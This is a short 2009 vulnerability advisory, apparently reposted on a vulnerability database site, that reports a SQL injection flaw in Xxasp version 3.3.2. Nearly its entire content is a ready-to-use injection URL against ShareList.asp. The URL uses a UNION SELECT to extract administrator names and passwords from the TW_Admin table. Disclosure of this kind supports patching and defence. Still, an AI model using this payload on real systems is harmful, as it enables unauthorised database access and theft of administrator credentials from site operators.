Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22851
HistoryDec 01, 2009 - 12:00 a.m.

Xxasp v3.3.2 Sql injection

2009-12-0100:00:00
vulners.com
16

########################## Securitylab.ir ########################

Application Info:

Name: Xxasp

Version: 3.3.2

#################################################################

Discoverd By: [email protected]

Website: http://securitylab.ir

Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir

#################################################################
#===========================================================

http://site.com/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select

1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
#===========================================================
#################################################################

Security Research Team

###################################################################